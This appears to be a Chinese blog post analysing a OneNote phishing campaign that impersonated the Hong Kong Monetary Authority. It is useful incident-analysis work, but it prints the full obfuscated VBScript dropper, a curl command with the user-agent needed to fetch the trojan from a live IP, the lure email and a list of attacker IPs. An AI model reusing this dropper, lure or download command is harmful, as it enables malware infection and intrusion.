使用Onenote进行钓鱼攻击事件分析

news2024/11/15 5:06:01

以其中遇到的一个案例为例子进行展开分析:

1、使用钓鱼邮件文案+.one文件附件

From: Bank Complaints <bankcomplaints@hkmagov.com>
Sent: Thursday, March 2, 2023 11:00 AM
To: Miles Mok XXXX
Subject: [External Mail] xxxx Industry Development Survey

Dear XXXX Ltd employees,

The Hong Kong Monetary Authority would like to conduct an annual banking industry development survey to assess the performance and employment situation in the financial industry. This is COMPULSORY for all employees to submit the survey to fulfill the requirement of CG-6 (Supervisory Policy Manual). Your feedback is extremely important to us, it would be highly appreciated if you could submit the survey by 10th March (Fri).

xxxx職員:

香港金融管理局每年也會進行一次銀行業發展調查,以了解金融行業的表現和就業情況。 根據 CG-6(監管政策手冊)的要求,所有銀行職員都必須提交問卷。 您的反饋對我們非常重要,如果您能於 310 (星期五) 前提交問卷,我們將感激不盡。

Yours sincerely,
Financial Infrastructure Development Department
Hong Kong Monetary Authority
香港金融管理局金融基建發展部
55th Floor |2 IFC 
8 Finance Street | Central 
Hong Kong  

2、钓鱼攻击基础设施分析

发件邮箱: bankcomplaints@hkmagov.com

VBS脚本内容:

<job id="AlterClassic">

       <script language="VBScript">

              Dim r

              Dim apa

              Dim apq

              Dim ape

              apq = "gM6VYXKWe"

              r= "p"

              Dim az

              az = "5.107/1Moc"

              r = r & "owE"

              r = r & "r"

              Dim en

              en = "ll htt"

              Dim et

              et = " -o %temp"

              ape = "vfy9XpqF"

              r = r & "sH"

              r = r & "el"

              Dim d

              d = "-"

              Dim q

              q = "w"

              q = "i" & q

              Dim u

              u = ":"

              apa = "5hwqtJeqJ"

              apv = "tgogNk"

              Dim ap

              ap = apa & apq & ape & apv

              Dim ad

              ad = "cUr"

              Dim aw

              aw = "L -k -A "

              Dim fi

              fi = "%\di"

              Dim gk

              gk = "smco"

              Dim ev

              ev = "re.d"

              Dim qw

              qw = "231.6"

              Dim dll

              dll = "Dis"

              Dim nm

              nm = "a7/160223"

              Dim de

              de = "ll"

              Dim sx

              sx = "%\Dis"

              Dim sc

              sc = "m.e"

              Dim sv

              sv = "xe htt"

              Dim sw

              sw = " %tem"

              Dim sp

              sp = "p%\Di"

              Dim zz

              zz = "ps://20."

              Dim bbc

              bbc = gk & ev & en & zz & qw & az & nm & " && "

              Dim sb

              sb = "sm.e"

              Dim sn

              sn = "xe"

              Dim dl

              dl = "dEl"

              Dim xe

              xe = "xe"

              Dim ed

              ed = "di"

              Dim sq

              sq = "a7/160224 &&"

              Dim xp

              xp = ad & aw & ap & et & fi & bbc & ad & aw & ap & et & sx & sc & sv & zz & qw & az  & sq & sw & sp & sb & sn

              CreateObject("WScript.Shell").Run "cmd.exe /c" & xp ,0, True

              Dim nd

              nd = dl & sw & "p%\" & dll & sc & xe & " && " & dl & sw & "p%\" & ed & gk & ev & de

              wscript.sleep 100000

              CreateObject("WScript.Shell").Run "cmd.exe /c" & nd ,0, True

       </script>

</job>

对其代码进行审计,最终拼接到使用vbs脚本下载远程木马,木马地址为:

20.231.65.107/1Moca7/160223

注意:这个木马不能直接访问下载,做了user-agent保护,需要使用-A user-agent参数才能下载。

curl -A 5hwqtJeqJgM6VYXKWevfy9XpqFtgogNk -o dsmcore.dll https://20.231.65.181/1Moca7/160223

使用微步在线情报系统对其IP进行关联查询

查询提示

发现该IP为美国 弗吉尼亚州 弗吉尼亚海滩机器,且已经被标记为钓鱼IP,最早在2022.3.22就开始作为钓鱼机器进行投递钓鱼木马。

另外对其IP的C段进行关联研究,发现C段存在20余台机器,都是用来做钓鱼的,肯定是一个公司的攻防团队部署的钓鱼基础设施。

我们将其所有IP捞取出来,如下所示:

20.231.65.88

20.231.65.131

20.231.65.136

20.231.65.3

20.231.65.47

20.231.65.80

20.231.65.86

20.231.65.101

20.231.65.106

20.231.65.147

20.231.65.164

20.231.65.181

20.231.65.187

20.231.65.207

20.231.65.247

20.231.65.254

20.231.65.10

20.231.65.109

20.231.65.51

20.231.65.125

3、钓鱼攻击手法研究

通过研究,发现了这个钓鱼团伙使用的真实攻击手法和攻击原理。

参考地址(2023.1.27号发现)

https://twitter.com/AttackTrends/status/1623670800266952705?s=20

黑客通过邮件利用 OneNote 附件安装恶意软件,盗取密码(附带病毒样本)-中心消息-OneNote 中心

黑客在网络钓鱼电子邮件中使用 OneNote 附件来安装恶意软件,获取访问密码。
恶意行为者利用 Microsoft OneNote 的频繁功能更新,双击垃圾邮件,自动运行脚本,将恶意软件从远程站点安装到用户的计算机中。
 

OneNote Microsoft 365 软件包中非常受欢迎的组件之一,现在该公司正在对其进行更新。但是,该产品频繁的 beta 测试导致黑客可以利用漏洞进行基于网络钓鱼的恶意软件攻击。现在,安全专业人员已经设置了警告,用于提醒恶意行为者使用 OneNote 附件秘密将恶意软件安装到用户设备中。

该警告最初是通过 Perception Point Attack Trends 的一条推文发送的,报告了该漏洞。该恶意软件不仅可以用于窃取密码,还可以用于攻击加密货币钱包,甚至在毫无戒心的用户设备上安装其他附加软件。

攻击原理:

黑客已经找到了绕过宏阻止的方法,来发送恶意软件。黑客会专门设计网络钓鱼的电子邮件,邮件包含假发票、付款或通知等内容。

在大多数情况下,电子邮件的图像会模糊,并带有双击查看文件的文字。

双击后实际上会运行一个恶意的 Visual Basic 脚本文件,该文件开始与远程服务器通信来安装恶意软件,包括各种特洛伊木马程序。

但是,为了充分保护自己,OneNote 用户一定要注意应用程序的警告,并尽可能使用多重身份验证、防病毒和防火墙。同时,不要从不熟悉的电子邮件链接下载附件。

本次钓鱼攻击流程截图:

1)攻击者批量发送邮件

2)受害者下载.one附件并且正常打开(实际效果截图)

注意: 为了迷惑用户,该图像包含的恶意代码从正常网站下载正常 .one 文件,用正常的 OneNote 打开正常的 .one 文件。后面的代码才从另外的黑客网站下载 bat 文件,并执行 bat 文件进行恶意操作,前面的 OneNote 打开只是作为挡箭牌使用,并非是 .one 文件格式有漏洞。

3)受害者双击Double click to view document(遮掩了隐藏的脚本),实际上会去执行vbs脚本

脚本内容如下:

4)受害者点击vbs脚本,自动拉取攻击者已经部署好的远控木马 

使用curl拉攻击服务器20.231.65.107的dll和exe木马并且执行

5)攻击者C2服务器获取了受害者的PC机器权限,用于进行进一步的内网渗透(信息收集)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/510293.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot+Canal+RabbitMQ实战

1. Canal简介 https://github.com/alibaba/canal 1.1 Canal工作原理 MySQL主备复制原理 MySQL master 将数据变更写入二进制日志( binary log, 其中记录叫做二进制日志事件binary log events&#xff0c;可以通过 show binlog events 进行查看)MySQL slave 将 master 的 b…

中断-NVIC与EXTI外设详解(超全面)

✅作者简介&#xff1a;嵌入式入坑者&#xff0c;与大家一起加油&#xff0c;希望文章能够帮助各位&#xff01;&#xff01;&#xff01;&#xff01; &#x1f4c3;个人主页&#xff1a;rivencode的个人主页 &#x1f525;系列专栏&#xff1a;玩转STM32 &#x1f4ac;推荐一…

档案馆对于档案室档案库房内温度和湿度的控制要求

编辑搜图 请点击输入图片描述&#xff08;最多18字&#xff09; 01 纸质档案库的温湿度要求 用房名称温度&#xff08;℃&#xff09;相对湿度&#xff08;%&#xff09;纸质档案库14~2445~60 02 特殊档案库的温湿度要求 用房名称温度&#xff08;℃&#xff09;相对湿度&am…

Golang中的运算符

目录 运算符 算术运算符 代码案例&#xff1a; 关系运算符 代码案例&#xff1a; 逻辑运算符 代码案例&#xff1a; 位运算符 代码案例&#xff1a; 赋值运算符 代码案例&#xff1a; 其他运算符 运算符 算术运算符 Go语言中的算术运算符包括加、减、乘、除和取模…

【深入理解redis】数据结构

文章目录 动态字符串SDS字符串编码类型 intsetDictZipListZipList的连锁更新问题 QuickListSkipListRedisObjectStringListSet结构ZSETHash Redis 共有 5 种基本数据结构&#xff1a;String&#xff08;字符串&#xff09;、List&#xff08;列表&#xff09;、Set&#xff08;…

2023进销存财务软件哪个好?哪些适合中小商户使用?

对于开店的老板来说&#xff0c;门店的财务管理一直都是比较头疼的一件事&#xff0c;销售业绩人工统计困难&#xff0c;记账对账效率低且容易出错。 使用进销存财务软件可以有效的帮助门店解决财务管理问题&#xff0c;但市面上这么多进销存财务软件&#xff0c;哪些性价比较高…

Android编译优化之混淆配置

Android编译优化之混淆配置 背景 为了使用java8及后续java新版本的特性&#xff0c;Google增加了一步编译过程—脱糖&#xff08;desugaring&#xff09;&#xff0c;但这一步会导致更长的编译时间&#xff0c;这也是为什么Google会推出D8和R8编译器来优化编译速度。 什么是脱…

【C语言】扫雷游戏

这里写目录标题 前言1.初始化棋盘2.展示棋盘3.布置雷4.开始扫雷4.1判断输赢4.2扫雷时连续性展开4.3展示玩法 5.整体代码展示5.1 game.h头文件展示5.2 game.c源文件展示5.3 text.c源文件展示 所属专栏&#xff1a;C语言 博主首页&#xff1a;初阳785 代码托管&#xff1a;chuyan…

了解 XML结构(一)

文章目录 1 XML定义2 了解XML结构3 XML节点类型4 加载读取XML5 小结 1 XML定义 XML是一种可扩展标记语言&#xff08;Extensible Markup Language, XML&#xff09;,可以用来标记数据&#xff0c;定义数据类型&#xff0c;是一种允许用户对自己的标记语言进行定义的源语言。 …

数据治理是一个部门的工作还是全业务体系的工作?_光点科技

随着互联网时代的到来&#xff0c;数据已成为企业生产和经营的重要资源。但是&#xff0c;随着数据量的不断增加和数据形态的多样化&#xff0c;如何管理和利用数据也成为了企业面临的一个重要问题。在这个过程中&#xff0c;数据治理成为了一个备受关注的话题。 那么&#xff…

ChatGPT1论文解读《Improving Language Understanding by Generative Pre-Training》

论文总结 以下是我阅读完整篇论文做的个人总结&#xff0c;基本包含了chatGPT1设计的完整框架思路&#xff0c;可以仅看【论文总结】章节。 在GPT1实现的核心架构中&#xff0c;包含两个阶段。 第一阶段 在第一阶段基于一个包含7000本书籍内容的海量未标注文本数据集进行无…

IP-Guard能否支持通过审批后才能发送邮件?

支持,但目前暂时只支持带有附件的邮件通过申请审批或者自我备案放开策略控制发送出去。 使用方式: 1、申请审批:设置了禁止发送邮件的邮件控制策略后,在申请权限-发送邮件中,设置允许发送,设置相关审批流程,管理员审批完成后即可发送。 -申请权限-审批流程 2、自我备案:…

SSM框架学习-注解开发第三方bean管理

1. 复习xml配置文件管理第三方bean 在Spring中&#xff0c;可以使用依赖注入&#xff08;Dependency Injection&#xff09;来管理和使用第三方Bean。Spring提供了多种方式来进行依赖注入&#xff0c;比如构造函数注入、Setter方法注入、字段注入等。下面以Setter方法注入为例&…

pycharm 常用插件,常用插件推荐

1. Key Promoter X 如果让我给新手推荐一个 PyCharm 必装插件&#xff0c;那一定是 Key Promoter X 。 它就相当于一个快捷键管理大师&#xff0c;它时刻地在&#xff1a; 教导你&#xff0c;当下你的这个操作&#xff0c;应该使用哪个快捷操作来提高效率&#xff1f;提醒你…

Scala学习(二)

文章目录 1.Scala的运算符1.1 Scala中的equals和 2.流程控制2.1 if2.2 Scala中的三目运算符2.3 for循环 3.循环中断 1.Scala的运算符 1.1 Scala中的equals和 回顾Java中的运算符 equals和,equals比较的为值&#xff0c; 比较的为地址 String a1new String("hi");…

【数据结构】线性表——带头双向循环链表

文章目录 带头双向循环链表带头双向循环链表主体结构带头双向循环链表操作函数介绍带头双向循环链表操作函数实现带头双向循环链表的初始化函数&#xff1a;打印函数带头双向循环链表插入函数&#xff1a;指定结点后插入和查找函数头插尾插 带头双向循环链表删除函数指定结点删…

2022东南大学网安916专硕上岸经验帖

本文目录 第一部分简单介绍我的一些选择 第二部分寒假大三下学期小学期暑假及大四上学期考前准备及考试过程考后估分与真实分数复试准备与复试过程复试结果导师选择经验对自己考研情况的评价一些建议 第一部分 简单介绍 最近忙完了毕业设计论文和教师资格证面试&#xff0c;终…

pc端项目的h5页面运行在手机浏览器使用vconsole查看页面元素、控制台、请求等信息

文章目录 一、vconsole介绍1. 作用2. 优势 二、使用1、jq项目和js项目2、vue项目 三、使用介绍1. 使用成功&#xff0c;在页面右下角会出现如下图的vConsole2. 常用功能&#xff08;控制台、请求、元素、存储器&#xff09; 一、vconsole介绍 1. 作用 使用vconsole来查看h5页…

怎么自学python?为什么选择python

自然是因为Python简单易学且应用领域广 Python近段时间一直涨势迅猛&#xff0c;在各大编程排行榜中崭露头角&#xff0c;得益于它多功能性和简单易上手的特性&#xff0c;让它可以在很多不同的工作中发挥重大作用。 正因如此&#xff0c;目前几乎所有大中型互联网企业都在使…

python写完程序怎么运行

python有两种运行方式&#xff0c;一种是在python交互式命令行下运行; 另一种是使用文本编辑器直接在命令行上运行。 注&#xff1a;以上两种运行方式均由CPython解释器编译运行。 当然&#xff0c;也可以将python代码写入eclipse中&#xff0c;用JPython解释器运行&#xff0c…